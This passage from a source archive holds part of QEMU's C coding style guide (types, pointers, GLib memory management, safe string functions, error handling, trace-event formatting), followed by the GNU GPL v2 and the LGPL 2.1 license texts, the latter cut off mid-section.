of 'void ``*``' in that target's ABI. (This may not be the same as the
size of a full CPU virtual address in the case of target ABIs which use
32 bit pointers on 64 bit CPUs, like sparc32plus.) Definitions of
structures that must match the target's ABI must use this type for
anything that on the target is defined to be an 'unsigned long' or a
pointer type. There is also a signed version, abi_long.

Of course, take all of the above with a grain of salt. If you're about
to use some system interface that requires a type like size_t, pid_t or
off_t, use matching types for any corresponding variables.

Also, if you try to use e.g., "unsigned int" as a type, and that
conflicts with the signedness of a related variable, sometimes it's
best just to use the *wrong* type, if "pulling the thread" and fixing
all related variables would be too invasive.

Finally, while using descriptive types is important, be careful not to
go overboard. If whatever you're doing causes warnings, or requires
casts, then reconsider or ask for help.

Pointers
--------

Ensure that all of your pointers are "const-correct". Unless a pointer
is used to modify the pointed-to storage, give it the "const"
attribute. That way, the reader knows up-front that this is a read-only
pointer. Perhaps more importantly, if we're diligent about this, when
you see a non-const pointer, you're guaranteed that it is used to
modify the storage it points to, or it is aliased to another pointer
that is.
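As a minimal sketch of const-correctness (both function names are
hypothetical, not QEMU APIs): the first function only reads the buffer,
so the pointer is const-qualified; the second one writes, so it is not:

.. code-block:: c

    /* Read-only access: the pointer is const-qualified */
    static unsigned int buffer_checksum(const uint8_t *buf, size_t len)
    {
        unsigned int sum = 0;
        size_t i;

        for (i = 0; i < len; i++) {
            sum += buf[i];
        }
        return sum;
    }

    /* Modifies the pointed-to storage, so no const */
    static void buffer_clear(uint8_t *buf, size_t len)
    {
        memset(buf, 0, len);
    }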
Typedefs
--------

Typedefs are used to eliminate the redundant 'struct' keyword, since
type names have a different style than other identifiers ("CamelCase"
versus "snake_case"). Each named struct type should have a CamelCase
name and a corresponding typedef.

Since certain C compilers choke on duplicated typedefs, you should
avoid them and declare a typedef only in one header file. For common
types, you can use "include/qemu/typedefs.h" for example. However, as a
matter of convenience it is also perfectly fine to use forward struct
definitions instead of typedefs in headers and function prototypes;
this avoids problems with duplicated typedefs and reduces the need to
include headers from other headers.

Reserved namespaces in C and POSIX
----------------------------------

Underscore capital, double underscore, and underscore 't' suffixes
should be avoided.

Low level memory management
===========================

Use of the malloc/free/realloc/calloc/valloc/memalign/posix_memalign
APIs is not allowed in the QEMU codebase. Instead of these routines,
use the GLib memory allocation routines
g_malloc/g_malloc0/g_new/g_new0/g_realloc/g_free or QEMU's
qemu_memalign/qemu_blockalign/qemu_vfree APIs.

Please note that g_malloc will exit on allocation failure, so there is
no need to test for failure (as you would have to with malloc). Calling
g_malloc with a zero size is valid and will return NULL.

Prefer g_new(T, n) instead of g_malloc(sizeof(T) ``*`` n) for the
following reasons:

* It catches multiplication overflowing size_t;
* It returns T ``*`` instead of void ``*``, letting compiler catch more
  type errors.

Declarations like

.. code-block:: c

    T *v = g_malloc(sizeof(*v))

are acceptable, though.

Memory allocated by qemu_memalign or qemu_blockalign must be freed with
qemu_vfree, since breaking this will cause problems on Win32.

String manipulation
===================

Do not use the strncpy function. As mentioned in the man page, it does
*not* guarantee a NULL-terminated buffer, which makes it extremely
dangerous to use. It also zeros trailing destination bytes out to the
specified length. Instead, use this similar function when possible, but
note its different signature:

.. code-block:: c

    void pstrcpy(char *dest, int dest_buf_size, const char *src)

Don't use strcat because it can't check for buffer overflows, but:

.. code-block:: c

    char *pstrcat(char *buf, int buf_size, const char *s)

The same limitation exists with sprintf and vsprintf, so use snprintf
and vsnprintf.

QEMU provides other useful string functions:

.. code-block:: c

    int strstart(const char *str, const char *val, const char **ptr)
    int stristart(const char *str, const char *val, const char **ptr)
    int qemu_strnlen(const char *s, int max_len)

There are also replacement character processing macros for isxyz and
toxyz, so instead of e.g. isalnum you should use qemu_isalnum.

Because of the memory management rules, you must use
g_strdup/g_strndup instead of plain strdup/strndup.

Printf-style functions
======================

Whenever you add a new printf-style function, i.e., one with a format
string argument and following "..." in its prototype, be sure to use
gcc's printf attribute directive in the prototype.

This makes it so gcc's -Wformat and -Wformat-security options can do
their jobs and cross-check format strings with the number and types of
arguments.
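For example, a prototype using the raw GCC attribute syntax could look
like the following (the function name is invented for illustration;
argument 2 is the format string and the variadic arguments start at
argument 3):

.. code-block:: c

    /* -Wformat can now cross-check fmt against the trailing arguments */
    void log_device_error(int level, const char *fmt, ...)
        __attribute__((format(printf, 2, 3)));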
C standard, implementation defined and undefined behaviors
==========================================================

C code in QEMU should be written to the C99 language specification. A
copy of the final version of the C99 standard with corrigenda TC1, TC2,
and TC3 included, formatted as a draft, can be downloaded from:

`<http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf>`_

The C language specification defines regions of undefined behavior and
implementation defined behavior (to give compiler authors enough leeway
to produce better code). In general, code in QEMU should follow the
language specification and avoid both undefined and implementation
defined constructs. ("It works fine on the gcc I tested it with" is not
a valid argument...) However there are a few areas where we allow
ourselves to assume certain behaviors because in practice all the
platforms we care about behave in the same way and writing strictly
conformant code would be painful. These are:

* you may assume that integers are 2s complement representation
* you may assume that right shift of a signed integer duplicates
  the sign bit (ie it is an arithmetic shift, not a logical shift)

In addition, QEMU assumes that the compiler does not use the latitude
given in C99 and C11 to treat aspects of signed '<<' as undefined, as
documented in the GNU Compiler Collection manual starting at version
4.0.

Automatic memory deallocation
=============================

QEMU has a mandatory dependency on either the GCC or CLang compiler. As
such it has the freedom to make use of a C language extension for
automatically running a cleanup function when a stack variable goes out
of scope. This can be used to simplify function cleanup paths, often
allowing many goto jumps to be eliminated, through automatic free'ing
of memory.

The GLib2 library provides a number of functions/macros for enabling
automatic cleanup:

`<https://developer.gnome.org/glib/stable/glib-Miscellaneous-Macros.html>`_

Most notably:

* g_autofree - will invoke g_free() on the variable going out of scope
* g_autoptr - for structs / objects, will invoke the cleanup func
  created by a previous use of G_DEFINE_AUTOPTR_CLEANUP_FUNC. This is
  supported for most GLib data types and GObjects

For example, instead of

.. code-block:: c

    int somefunc(void)
    {
        int ret = -1;
        char *foo = g_strdup_printf("foo%", "wibble");
        GList *bar = .....

        if (eek) {
            goto cleanup;
        }

        ret = 0;

     cleanup:
        g_free(foo);
        g_list_free(bar);
        return ret;
    }

Using g_autofree/g_autoptr enables the code to be written as:

.. code-block:: c

    int somefunc(void)
    {
        g_autofree char *foo = g_strdup_printf("foo%", "wibble");
        g_autoptr (GList) bar = .....

        if (eek) {
            return -1;
        }

        return 0;
    }

While this generally results in simpler, less leak-prone code, there
are still some caveats to beware of:

* Variables declared with g_auto* MUST always be initialized, otherwise
  the cleanup function will use uninitialized stack memory
* If a variable declared with g_auto* holds a value which must live
  beyond the life of the function, that value must be saved and the
  original variable NULL'd out. This can be simpler using
  g_steal_pointer

.. code-block:: c

    char *somefunc(void)
    {
        g_autofree char *foo = g_strdup_printf("foo%", "wibble");
        g_autoptr (GList) bar = .....

        if (eek) {
            return NULL;
        }

        return g_steal_pointer(&foo);
    }

QEMU Specific Idioms
********************

Error handling and reporting
============================

Reporting errors to the human user
----------------------------------

Do not use printf(), fprintf() or monitor_printf(). Instead, use
error_report() or error_vreport() from error-report.h. This ensures the
error is reported in the right place (current monitor or stderr), and
in a uniform format.

Use error_printf() & friends to print additional information.

error_report() prints the current location. In certain common cases
like command line parsing, the current location is tracked
automatically. To manipulate it manually, use the loc_``*``() from
error-report.h.

Propagating errors
------------------

An error can't always be reported to the user right where it's
detected, but often needs to be propagated up the call chain to a place
that can handle it. This can be done in various ways.

The most flexible one is Error objects. See error.h for usage
information.

Use the simplest suitable method to communicate success / failure to
callers. Stick to common methods: non-negative on success / -1 on
error, non-negative / -errno, non-null / null, or Error objects.

Example: when a function returns a non-null pointer on success, and it
can fail only in one way (as far as the caller is concerned), returning
null on failure is just fine, and certainly simpler and a lot easier on
the eyes than propagating an Error object through an Error ``*````*``
parameter.

Example: when a function's callers need to report details on failure
only the function really knows, use Error ``*````*``, and set suitable
errors.

Do not report an error to the user when you're also returning an error
for somebody else to handle. Leave the reporting to the place that
consumes the error returned.

Handling errors
---------------

Calling exit() is fine when handling configuration errors during
startup. It's problematic during normal operation. In particular,
monitor commands should never exit().

Do not call exit() or abort() to handle an error that can be triggered
by the guest (e.g., some unimplemented corner case in guest code
translation or device emulation). Guests should not be able to
terminate QEMU.

Note that &error_fatal is just another way to exit(1), and &error_abort
is just another way to abort().
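To make the Error ``*````*`` convention from "Propagating errors"
concrete, here is a minimal sketch. It assumes the error_setg() and
error_report_err() helpers from QEMU's error API ("qapi/error.h") plus
POSIX open() from <fcntl.h>; the device-open function itself and the
device path are invented for illustration:

.. code-block:: c

    static int frob_device_open(const char *path, Error **errp)
    {
        int fd = open(path, O_RDWR);

        if (fd < 0) {
            /* set the error for the caller instead of reporting it here */
            error_setg(errp, "could not open frob device %s", path);
            return -1;
        }
        return fd;
    }

    /* The caller decides whether to handle or report the failure */
    Error *err = NULL;
    int fd = frob_device_open("/dev/frob0", &err);
    if (fd < 0) {
        error_report_err(err);
    }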
trace-events style
==================

0x prefix
---------

In trace-events files, use a '0x' prefix to specify hex numbers, as in:

.. code-block::

    some_trace(unsigned x, uint64_t y) "x 0x%x y 0x" PRIx64

An exception is made for groups of numbers that are hexadecimal by
convention and separated by the symbols '.', '/', ':', or ' ' (such as
PCI bus id):

.. code-block::

    another_trace(int cssid, int ssid, int dev_num) "bus id: %x.%x.%04x"

However, you can use '0x' for such groups if you want. Anyway, be sure
that it is obvious that numbers are in hex, ex.:

.. code-block::

    data_dump(uint8_t c1, uint8_t c2, uint8_t c3) "bytes (in hex): %02x %02x %02x"

Rationale: hex numbers are hard to read in logs when there is no 0x
prefix, especially when (occasionally) the representation doesn't
contain any letters and especially in one line with other decimal
numbers. Number groups are allowed to not use '0x' because for some
things notations like %x.%x.%x are used not only in Qemu. Also dumping
raw data bytes with '0x' is less readable.

'#' printf flag
---------------

Do not use printf flag '#', like '%#x'.

Rationale: there are two ways to add a '0x' prefix to a printed number:
'0x%...' and '%#...'. For consistency only one way should be used.
Arguments for '0x%' are:

* it is more popular
* '%#' omits the 0x for the value 0 which makes output inconsistent

unicorn-2.1.1/qemu/COPYING:

                    GNU GENERAL PUBLIC LICENSE
                       Version 2, June 1991

 Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

                            Preamble

The licenses for most software are designed to take away your freedom
to share and change it. By contrast, the GNU General Public License is
intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.

When we speak of free software, we are referring to freedom, not price.
Our General Public Licenses are designed to make sure that you have the
freedom to distribute copies of free software (and charge for this
service if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. 
You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. 
For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. 
Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 
END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the program's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. <signature of Ty Coon>, 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. 
unicorn-2.1.1/qemu/COPYING.LIB:

                  GNU LESSER GENERAL PUBLIC LICENSE
                       Version 2.1, February 1999

 Copyright (C) 1991, 1999 Free Software Foundation, Inc.
 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

[This is the first released version of the Lesser GPL. It also counts
as the successor of the GNU Library Public License, version 2, hence
the version number 2.1.]

                            Preamble

The licenses for most software are designed to take away your freedom
to share and change it. By contrast, the GNU General Public Licenses
are intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users.

This license, the Lesser General Public License, applies to some
specially designated software packages--typically libraries--of the
Free Software Foundation and other authors who decide to use it. You
can use it too, but we suggest you first think carefully about whether
this license or the ordinary General Public License is the better
strategy to use in any particular case, based on the explanations
below.

When we speak of free software, we are referring to freedom of use, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish); that you receive source code or can get it
if you want it; that you can change the software and use pieces of it
in new free programs; and that you are informed that you can do these
things.

To protect your rights, we need to make restrictions that forbid
distributors to deny you these rights or to ask you to surrender these
rights. These restrictions translate to certain responsibilities for
you if you distribute copies of the library or if you modify it.

For example, if you distribute copies of the library, whether gratis or
for a fee, you must give the recipients all the rights that we gave
you. You must make sure that they, too, receive or can get the source
code. If you link other code with the library, you must provide
complete object files to the recipients, so that they can relink them
with the library after making changes to the library and recompiling
it. And you must show them these terms so they know their rights.

We protect your rights with a two-step method: (1) we copyright the
library, and (2) we offer you this license, which gives you legal
permission to copy, distribute and/or modify the library.
To protect each distributor, we want to make it very clear that there is no warranty for the free library. Also, if the library is modified by someone else and passed on, the recipients should know that what they have is not the original version, so that the original author's reputation will not be affected by problems that might be introduced by others. Finally, software patents pose a constant threat to the existence of any free program. We wish to make sure that a company cannot effectively restrict the users of a free program by obtaining a restrictive license from a patent holder. Therefore, we insist that any patent license obtained for a version of the library must be consistent with the full freedom of use specified in this license. Most GNU software, including some libraries, is covered by the ordinary GNU General Public License. This license, the GNU Lesser General Public License, applies to certain designated libraries, and is quite different from the ordinary General Public License. We use this license for certain libraries in order to permit linking those libraries into non-free programs. When a program is linked with a library, whether statically or using a shared library, the combination of the two is legally speaking a combined work, a derivative of the original library. The ordinary General Public License therefore permits such linking only if the entire combination fits its criteria of freedom. The Lesser General Public License permits more lax criteria for linking other code with the library. We call this license the "Lesser" General Public License because it does Less to protect the user's freedom than the ordinary General Public License. It also provides other free software developers Less of an advantage over competing non-free programs. These disadvantages are the reason we use the ordinary General Public License for many libraries. However, the Lesser license provides advantages in certain special circumstances. For example, on rare occasions, there may be a special need to encourage the widest possible use of a certain library, so that it becomes a de-facto standard. To achieve this, non-free programs must be allowed to use the library. A more frequent case is that a free library does the same job as widely used non-free libraries. In this case, there is little to gain by limiting the free library to free software only, so we use the Lesser General Public License. In other cases, permission to use a particular library in non-free programs enables a greater number of people to use a large body of free software. For example, permission to use the GNU C Library in non-free programs enables many more people to use the whole GNU operating system, as well as its variant, the GNU/Linux operating system. Although the Lesser General Public License is Less protective of the users' freedom, it does ensure that the user of a program that is linked with the Library has the freedom and the wherewithal to run that program using a modified version of the Library. The precise terms and conditions for copying, distribution and modification follow. Pay close attention to the difference between a "work based on the library" and a "work that uses the library". The former contains code derived from the library, whereas the latter must be combined with the library in order to run. GNU LESSER GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. 
This License Agreement applies to any software library or other program which contains a notice placed by the copyright holder or other authorized party saying it may be distributed under the terms of this Lesser General Public License (also called "this License"). Each licensee is addressed as "you". A "library" means a collection of software functions and/or data prepared so as to be conveniently linked with application programs (which use some of those functions and data) to form executables. The "Library", below, refers to any such software library or work which has been distributed under these terms. A "work based on the Library" means either the Library or any derivative work under copyright law: that is to say, a work containing the Library or a portion of it, either verbatim or with modifications and/or translated straightforwardly into another language. (Hereinafter, translation is included without limitation in the term "modification".) "Source code" for a work means the preferred form of the work for making modifications to it. For a library, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the library. Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running a program using the Library is not restricted, and output from such a program is covered only if its contents constitute a work based on the Library (independent of the use of the Library in a tool for writing it). Whether that is true depends on what the Library does and what the program that uses the Library does. 1. You may copy and distribute verbatim copies of the Library's complete source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and distribute a copy of this License along with the Library. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Library or any portion of it, thus forming a work based on the Library, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) The modified work must itself be a software library. b) You must cause the files modified to carry prominent notices stating that you changed the files and the date of any change. c) You must cause the whole of the work to be licensed at no charge to all third parties under the terms of this License. d) If a facility in the modified Library refers to a function or a table of data to be supplied by an application program that uses the facility, other than as an argument passed when the facility is invoked, then you must make a good faith effort to ensure that, in the event an application does not supply such function or table, the facility still operates, and performs whatever part of its purpose remains meaningful. (For example, a function in a library to compute square roots has a purpose that is entirely well-defined independent of the application. 
Therefore, Subsection 2d requires that any application-supplied function or table used by this function must be optional: if the application does not supply it, the square root function must still compute square roots.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Library, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Library, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Library. In addition, mere aggregation of another work not based on the Library with the Library (or with a work based on the Library) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may opt to apply the terms of the ordinary GNU General Public License instead of this License to a given copy of the Library. To do this, you must alter all the notices that refer to this License, so that they refer to the ordinary GNU General Public License, version 2, instead of to this License. (If a newer version than version 2 of the ordinary GNU General Public License has appeared, then you can specify that version instead if you wish.) Do not make any other change in these notices. Once this change is made in a given copy, it is irreversible for that copy, so the ordinary GNU General Public License applies to all subsequent copies and derivative works made from that copy. This option is useful when you wish to copy part of the code of the Library into a program that is not a library. 4. You may copy and distribute the Library (or a portion or derivative of it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange. If distribution of object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place satisfies the requirement to distribute the source code, even though third parties are not compelled to copy the source along with the object code. 5. A program that contains no derivative of any portion of the Library, but is designed to work with the Library by being compiled or linked with it, is called a "work that uses the Library". Such a work, in isolation, is not a derivative work of the Library, and therefore falls outside the scope of this License. However, linking a "work that uses the Library" with the Library creates an executable that is a derivative of the Library (because it contains portions of the Library), rather than a "work that uses the library". The executable is therefore covered by this License. Section 6 states terms for distribution of such executables. 
When a "work that uses the Library" uses material from a header file that is part of the Library, the object code for the work may be a derivative work of the Library even though the source code is not. Whether this is true is especially significant if the work can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely defined by law. If such an object file uses only numerical parameters, data structure layouts and accessors, and small macros and small inline functions (ten lines or less in length), then the use of the object file is unrestricted, regardless of whether it is legally a derivative work. (Executables containing this object code plus portions of the Library will still fall under Section 6.) Otherwise, if the work is a derivative of the Library, you may distribute the object code for the work under the terms of Section 6. Any executables containing that work also fall under Section 6, whether or not they are linked directly with the Library itself. 6. As an exception to the Sections above, you may also combine or link a "work that uses the Library" with the Library to produce a work containing portions of the Library, and distribute that work under terms of your choice, provided that the terms permit modification of the work for the customer's own use and reverse engineering for debugging such modifications. You must give prominent notice with each copy of the work that the Library is used in it and that the Library and its use are covered by this License. You must supply a copy of this License. If the work during execution displays copyright notices, you must include the copyright notice for the Library among them, as well as a reference directing the user to the copy of this License. Also, you must do one of these things: a) Accompany the work with the complete corresponding machine-readable source code for the Library including whatever changes were used in the work (which must be distributed under Sections 1 and 2 above); and, if the work is an executable linked with the Library, with the complete machine-readable "work that uses the Library", as object code and/or source code, so that the user can modify the Library and then relink to produce a modified executable containing the modified Library. (It is understood that the user who changes the contents of definitions files in the Library will not necessarily be able to recompile the application to use the modified definitions.) b) Use a suitable shared library mechanism for linking with the Library. A suitable mechanism is one that (1) uses at run time a copy of the library already present on the user's computer system, rather than copying library functions into the executable, and (2) will operate properly with a modified version of the library, if the user installs one, as long as the modified version is interface-compatible with the version that the work was made with. c) Accompany the work with a written offer, valid for at least three years, to give the same user the materials specified in Subsection 6a, above, for a charge no more than the cost of performing this distribution. d) If distribution of the work is made by offering 